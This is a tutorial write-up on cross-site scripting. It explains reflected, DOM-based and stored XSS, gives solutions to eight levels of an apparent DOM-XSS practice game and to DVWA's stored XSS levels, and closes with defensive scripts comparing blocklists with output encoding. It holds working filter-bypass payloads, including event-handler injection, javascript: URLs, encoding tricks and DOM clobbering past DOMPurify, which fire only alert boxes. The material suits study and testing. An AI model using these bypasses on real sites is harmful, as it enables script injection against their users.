Contents

XSS in brief
I. Reflected XSS: 1. Vulnerability logic; why some tags can trigger it and others cannot (tags that can, tags that cannot, and why)
II. DOM-based XSS: 1. Ma Spaghet! 2. Jefff 3. Ugandan Knuckles 4. Ricardo Milos 5. Ah That's Hawt 6. Ligma 7. Mafia 8. Ok, Boomer (each with requirement, analysis and result)
III. Stored XSS: vulnerability principle; reproduction at the low, medium and high levels

XSS in brief

XSS is a web security vulnerability that lets an attacker inject a malicious script into a web page and thereby affect the users who view it. The main types are reflected XSS, DOM-based XSS and stored XSS. Defences include input validation, escaping user input and using HttpOnly cookies. This article explains the principles of each kind of XSS attack and how to defend against them.

I. Reflected XSS

1. Vulnerability logic

The front end parses JavaScript, and a reflected-XSS payload is itself JavaScript: when JavaScript entered by the user is placed into the front end without adequate filtering and parsed there, the vulnerability arises.

Note that XSS cannot be written into just any tag: if the injected code is not parsed, it may instead be exposed as plain text.

Commonly used JavaScript functions: alert(), confirm(), prompt(). All of them hang off the common ancestor window, which is why they are so easy to reach.

Why some tags can trigger it and others cannot

Tags that can trigger it

In reflected XSS, many HTML tags can be used to trigger the attack under particular conditions. These tags usually carry event-handler attributes such as onerror, onmouseover or onclick, and those attributes can execute JavaScript. Some common tags that can trigger XSS, with examples:

- img: through the onerror event handler; when the image fails to load, the JavaScript in the handler runs. Example: <img src=x onerror=alert('XSS')>
- script: the most direct way, used to insert and execute JavaScript directly. In many cases, however, the script tag is filtered, so the attacker has to look for ways around the filter.
- a: through the href attribute with a pseudo-protocol such as javascript:, or combined with an onclick event handler. Example: <a href="javascript:alert('XSS')">Click me</a>
- input, button and other form elements: these can trigger XSS through event handlers such as onclick or onsubmit.

Tags that cannot trigger it

Not every HTML tag can be used directly to trigger XSS. Some tags contain no executable JavaScript and carry no event-handler attributes, so they cannot be used directly for this purpose. Even so, a tag that cannot trigger XSS by itself may still be used to build a more complex attack, for example by modifying the DOM structure to influence a tag that can.

In general the following kinds of tag are unlikely to trigger XSS directly:

- Purely presentational tags such as p and h1: these only display text and contain no executable code or event handlers.
- Tags without event handlers: if a tag does not contain, or does not allow, event-handler attributes such as onclick or onerror, it cannot be used directly to trigger XSS.

Why some tags trigger and others do not

- Event-handler attributes: tags that can trigger XSS usually carry event-handler attributes, which allow JavaScript to run when the corresponding event fires.
- Filtering: many web applications implement input filtering to block or limit the insertion of dangerous tags such as script, so a tag that could trigger XSS in theory may be blocked by the filter in practice.
- Browser security policies: modern browsers implement several policies against XSS, including Content Security Policy (CSP) and the same-origin policy, which can restrict or forbid certain kinds of script execution or resource loading.

II. DOM-based XSS

These exercises use an online DOM-XSS practice platform.

1. Ma Spaghet!
Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: every parameter passed in is placed directly inside the h2 tag. <script>alert(1)</script> is officially considered dangerous and is blocked, so try the img tag instead; innerHTML only neutralizes <script></script>.

?somebody=<img%20src=1%20onerror=alert(1337)>

Result: (screenshot)

2. Jefff

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: the value is written into the h2 with innerText, so there is essentially nothing to be done on the maname.innerText = ma side; the only place left to work is the eval.

Attempt 1: close the double quote, then put the payload inside it. The evaluated string becomes ma = "Ma name is aaa";alert(12);"" . Try ?jeff=aaa";alert(1337);"

Attempt 2: use a concatenation operator instead. Try ?jeff=asd";-alert(12)-"

Result: (screenshot)

3. Ugandan Knuckles

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: wey = wey.replace(/[<>]/g, '') filters < and >. Try closing the double quote: wey=aaa" onclick=alert(1337) works, but it requires user interaction. onfocus does not focus the element by itself, so we also need autofocus to focus it automatically; then the handler fires without any user involvement.

Try ?wey=aaa" onfocus=alert(1337) autofocus=true

Result: (screenshot)

4. Ricardo Milos

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: the code submits the form after 2 seconds; the submission target is ricardo.action, whose path comes from the GET parameter ricardo. The action attribute accepts the javascript: pseudo-protocol.

Try ?ricardo=javascript:alert(1337)

Result: (screenshot)

5. Ah That's Hawt

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: smith = smith.replace(/[\(\`\)\\]/g, '') filters parentheses, backtick and backslash. smith.replace filters the raw input, but we can get around the filter with encoding. First try ?markassbrownlee=<img src=1 onerror=alert(1)>. The parameter travels in the URL: if we encode the 1336 payload, the browser decodes it automatically when handing it to smith; but the URL has to follow URL rules, so HTML entity encoding cannot be sent as-is and must itself be URL-encoded.

HTML entity encoding: markassbrownlee=<img src=1 onerror=alert&#40;1336&#41;>

URL encoding: markassbrownlee=<img src=1 onerror=alert%26%2340%3B1336%26%2341%3B>

Result: (screenshot)

6. Ligma

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: letters and digits are filtered and the result goes straight into eval, so we have to use JSFuck, which obfuscates ordinary JavaScript into a string made up only of the six characters [ ] ( ) ! +.

Input alert(1337), JSFuck-encode it, and URL-encode the result before sending it.
Try submitting it: ?balls=<URL-encoded JSFuck payload>

Result: (screenshot)

7. Mafia

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: the filters are: the string is truncated to 50 characters; the characters - ! \ [ ] are replaced with _; and the word alert is replaced with _.

Define an anonymous function and build the payload from its argument, using a regular expression to get around the check on the alert string:

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

Or use the conversion between numbers and strings to get around the alert check:

?mafia=eval(8680439..toString(30))(1337)

Result: (screenshot)

8. Ok, Boomer

Requirement: pop up 1337 without user interaction (no clicking on a tag or similar).

Analysis: the page uses the third-party library DOMPurify to filter illegal input. In setTimeout(ok, 2000), ok can receive either a function or a string, so if we can inject an executable payload into the variable ok, the alert will fire.

This can be done with DOM clobbering: injecting a DOM element into the HTML in order to control a JavaScript variable. First construct the variable ok by creating a DOM element with id=ok. ok has to receive a string as its value, and when toString() is called on an a tag it returns the value of its href attribute, so the a tag is the right element to build on.

Reading the DOMPurify source shows that its allowed protocols include mailto, tel, xmpp and others.

Try ?boomer=<a%20id=ok%20href="mailto:alert(1337)">

Result: (screenshot)

III. Stored XSS

Vulnerability principle

Stored XSS, also called persistent XSS, stores the attack script permanently in the target server's database or files, which makes it highly covert.

Unlike reflected XSS, in stored XSS the attacker sends the malicious payload to the back-end server through a message board, a blog system or similar, where it is stored; when other users visit that page they are attacked, without having to click on the payload themselves.

Reproduction

Low level

Enter the low-level stored XSS module and try an attack with a simple JavaScript statement; first set the security level to low.

The XSS (Stored) source applies stripslashes and mysqli_real_escape_string to the data, which is finally inserted and displayed on index.php. Insert our malicious code and check whether it works.

Medium level

Using the low-level attack, we find that script is filtered. The back-end code shows the same filter as the corresponding reflected XSS module: the script tag is removed. Use the img tag instead:

<img%20src=1%20onerror=alert(1337)>

High level

Note: the length limit on the name field has to be changed again in order to get around it.

At the high level, neither the low-level nor the medium-level attack succeeds. As in reflected XSS, the high-level stored XSS code uses replace to filter the script tag thoroughly. Try an attack with the img tag:

<img src=x onerror=alert('xss')>
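The reflected section lists the tags that carry event handlers, and the medium/high stored levels remove only the script tag. As an added example that is not code from the original post or from DVWA, the script below runs those payloads through a script-tag blocklist (stripScriptTag, an assumed JavaScript re-implementation of the "remove the script tag" idea, not the DVWA PHP source) and through full HTML entity encoding (escapeHtml), and counts what each leaves executable; containsActiveContent is a review helper for flagging event-handler attributes and javascript: URLs in stored content.

```javascript
// Added example: a <script>-only blocklist versus HTML entity encoding, applied to
// the payloads discussed in this post. Not DVWA's code; stripScriptTag is an
// assumed JavaScript re-implementation of the "remove the script tag" idea.

// Blocklist: remove opening and closing script tags and nothing else.
function stripScriptTag(input) {
  return input.replace(/<script[^>]*>/gi, "").replace(/<\/script>/gi, "");
}

// Allowlist-style output encoding: turn the five HTML metacharacters into
// character references so the browser renders the whole value as text.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Review/detection helper: would a browser still execute anything in this markup?
// Flags a surviving <script> tag, a tag with an on* event-handler attribute, or a
// tag whose href/src/action points at a javascript: URL.
const ACTIVE_CONTENT =
  /<script\b|<\w[^>]*\son\w+\s*=|<\w[^>]*\s(?:href|src|action)\s*=\s*["']?\s*javascript:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

// Constructed samples: the tag types the post lists as able to trigger XSS.
const SAMPLES = [
  "<script>alert(1)</script>",
  "<img src=x onerror=alert('xss')>",
  "<a href=\"javascript:alert('XSS')\">Click me</a>",
  "<input value=\"aaa\" onfocus=alert(1337) autofocus=true>",
];

// How many of the samples does each output strategy still leave executable?
function countSurvivors(render) {
  return SAMPLES.filter((p) => containsActiveContent(render(p))).length;
}

console.log("blocklist leaves executable:", countSurvivors(stripScriptTag)); // 3
console.log("encoding leaves executable:", countSurvivors(escapeHtml));      // 0
```

The blocklist only stops the one payload that actually uses a script tag; encoding the output removes the question of which tags are dangerous altogether.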
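The Ah That's Hawt level above checks for parentheses before the value is parsed as HTML, which is why the entity-encoded form gets through. As an added example that is not part of the original post or the game's code, the script below replays the decoding stages the value passes through and shows the check a canonicalize-first filter would make; hawtFilter reproduces the filter as quoted in the post, while decodeNumericEntities, pipeline and violatesPolicyAfterCanonicalization are assumed helpers (decodeNumericEntities is a minimal stand-in for the browser's HTML parser).

```javascript
// Added example: why the "Ah That's Hawt" filter misses parentheses.
// The level strips ( ) ` \ from the raw query value, but the value is then parsed
// as HTML, where &#40; and &#41; turn back into ( and ). Not the game's code;
// decodeNumericEntities is a minimal stand-in for the browser's HTML parser.

// The filter as quoted in the post.
function hawtFilter(smith) {
  return smith.replace(/[\(\`\)\\]/g, "");
}

// Decode HTML numeric character references only (&#40; and &#x28;);
// named references such as &lpar; are out of scope here.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);/gi, (_, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// The three stages a query value goes through: the browser URL-decodes it, the
// page filters it, and innerHTML parses the result (decoding entities).
function pipeline(rawQueryValue) {
  const afterFilter = hawtFilter(decodeURIComponent(rawQueryValue));
  const afterHtmlParse = decodeNumericEntities(afterFilter);
  return { afterFilter, afterHtmlParse, parensSurvive: /[()]/.test(afterHtmlParse) };
}

// The defensive version of the same check: decode every layer the data will
// later pass through, then test for the characters the policy forbids.
function violatesPolicyAfterCanonicalization(rawQueryValue) {
  const canonical = decodeNumericEntities(decodeURIComponent(rawQueryValue));
  return /[()`\\]/.test(canonical);
}

// Constructed sample: the URL-encoded form of the payload used in the post.
const SAMPLE = "%3Cimg%20src%3D1%20onerror%3Dalert%26%2340%3B1336%26%2341%3B%3E";

console.log(pipeline(SAMPLE).afterFilter);    // <img src=1 onerror=alert&#40;1336&#41;>  (filter sees no parentheses)
console.log(pipeline(SAMPLE).afterHtmlParse); // <img src=1 onerror=alert(1336)>          (the browser does)
console.log(violatesPolicyAfterCanonicalization(SAMPLE)); // true
```

The general lesson is that a character filter has to run on the same representation the consumer will see; here the consumer is the HTML parser, so the check must follow entity decoding, and output encoding remains the simpler fix.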